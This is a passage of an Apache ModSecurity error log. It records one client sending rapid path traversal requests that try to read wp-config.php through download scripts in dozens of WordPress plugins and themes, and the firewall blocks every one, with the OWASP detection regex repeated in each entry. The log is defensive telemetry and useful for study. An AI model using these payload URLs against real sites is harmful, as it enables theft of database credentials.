"2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/zip-attachments/download.php?za_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "YtscbCpbG8_UBGXeM63wzAAAAJA"] [Fri Jul 22 16:53:48.891996 2022] [:error] [pid 22472:tid 140017125021440] [client 72.11.157.116:51586] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "YtscbCpbG8_UBGXeM63wzQAAAII"] [Fri Jul 22 16:53:49.618907 2022] [:error] [pid 22470:tid 140017083057920] [client 72.11.157.116:51590] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php"] [unique_id "YtscbXxqqtgWgIAXsGFhggAAAAc"] [Fri Jul 22 16:53:49.713691 2022] [:error] [pid 22472:tid 140016940381952] [client 72.11.157.116:51592] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/authentic/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/authentic/includes/download.php"] [unique_id "YtscbSpbG8_UBGXeM63wzwAAAJg"] [Fri Jul 22 16:53:49.811375 2022] [:error] [pid 22472:tid 140017083057920] [client 72.11.157.116:51594] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/acento/includes/view-pdf.php?download=1&file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/acento/includes/view-pdf.php"] [unique_id "YtscbSpbG8_UBGXeM63w0AAAAIc"] [Fri Jul 22 16:53:49.908299 2022] [:error] [pid 22472:tid 140017066272512] [client 72.11.157.116:51596] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/fiestaresidences/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/fiestaresidences/download.php"] [unique_id "YtscbSpbG8_UBGXeM63w0QAAAIk"] [Fri Jul 22 16:53:50.003541 2022] [:error] [pid 22472:tid 140017032701696] [client 72.11.157.116:51598] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/optimus/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/optimus/download.php"] [unique_id "YtscbipbG8_UBGXeM63w0gAAAI0"] [Fri Jul 22 16:53:50.111441 2022] [:error] [pid 22471:tid 140016982345472] [client 72.11.157.116:51600] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/erinvale/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/erinvale/download.php"] [unique_id "YtscbuCtYZwatdwcM8Wq2AAAAFM"] [Fri Jul 22 16:53:50.220025 2022] [:error] [pid 23081:tid 140017049487104] [client 72.11.157.116:51602] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/hsv/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/hsv/download.php"] [unique_id "YtscbnhurfgLch3PImzIDgAAAMs"] [Fri Jul 22 16:53:50.319731 2022] [:error] [pid 23081:tid 140017108236032] [client 72.11.157.116:51604] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/SMWF/inc/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/SMWF/inc/download.php"] [unique_id "YtscbnhurfgLch3PImzIDwAAAMQ"] [Fri Jul 22 16:53:50.409621 2022] [:error] [pid 23081:tid 140017125021440] [client 72.11.157.116:51606] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/markant/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/markant/download.php"] [unique_id "YtscbnhurfgLch3PImzIEAAAAMI"] [Fri Jul 22 16:53:50.513874 2022] [:error] [pid 23081:tid 140017083057920] [client 72.11.157.116:51608] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/yakimabait/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/yakimabait/download.php"] [unique_id "YtscbnhurfgLch3PImzIEQAAAMc"] [Fri Jul 22 16:53:50.661987 2022] [:error] [pid 23081:tid 140016973952768] [client 72.11.157.116:51612] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/TheLoft/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/TheLoft/download.php"] [unique_id "YtscbnhurfgLch3PImzIEgAAANQ"] [Fri Jul 22 16:53:50.751220 2022] [:error] [pid 22471:tid 140017041094400] [client 72.11.157.116:51614] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/felis/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/felis/download.php"] [unique_id "YtscbuCtYZwatdwcM8Wq2QAAAEw"] [Fri Jul 22 16:53:50.841118 2022] [:error] [pid 22472:tid 140017057879808] [client 72.11.157.116:51616] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/MichaelCanthony/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/MichaelCanthony/download.php"] [unique_id "YtscbipbG8_UBGXeM63w0wAAAIo"] [Fri Jul 22 16:53:50.934082 2022] [:error] [pid 22472:tid 140016973952768] [client 72.11.157.116:51618] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/trinity/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/trinity/lib/scripts/download.php"] [unique_id "YtscbipbG8_UBGXeM63w1AAAAJQ"] [Fri Jul 22 16:53:51.023504 2022] [:error] [pid 23081:tid 140016957167360] [client 72.11.157.116:51620] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/epic/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/epic/includes/download.php"] [unique_id "Ytscb3hurfgLch3PImzIEwAAANY"] [Fri Jul 22 16:53:51.113761 2022] [:error] [pid 22472:tid 140016990738176] [client 72.11.157.116:51622] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/urbancity/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/urbancity/lib/scripts/download.php"] [unique_id "YtscbypbG8_UBGXeM63w1QAAAJI"] [Fri Jul 22 16:53:51.213722 2022] [:error] [pid 22470:tid 140017091450624] [client 72.11.157.116:51624] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/antioch/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/antioch/lib/scripts/download.php"] [unique_id "Ytscb3xqqtgWgIAXsGFhhAAAAAY"] [Fri Jul 22 16:53:51.311328 2022] [:error] [pid 23081:tid 140017099843328] [client 72.11.157.116:51626] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/churchope/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "Ytscb3hurfgLch3PImzIFAAAAMU"] [Fri Jul 22 16:53:51.415139 2022] [:error] [pid 23081:tid 140016990738176] [client 72.11.157.116:51628] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/lote27/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/lote27/download.php"] [unique_id "Ytscb3hurfgLch3PImzIFQAAANI"] [Fri Jul 22 16:53:51.504374 2022] [:error] [pid 23081:tid 140016965560064] [client 72.11.157.116:51630] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/linenity/functions/download.php?imgurl=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/linenity/functions/download.php"] [unique_id "Ytscb3hurfgLch3PImzIFgAAANU"] [Fri Jul 22 16:53:51.594586 2022] [:error] [pid 22471:tid 140017007523584] [client 72.11.157.116:51632] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/medicate/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/medicate/download.php"] [unique_id "Ytscb-CtYZwatdwcM8Wq2gAAAFA"] [Fri Jul 22 16:53:51.698574 2022] [:error] [pid 23081:tid 140017091450624] [client 72.11.157.116:51634] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match 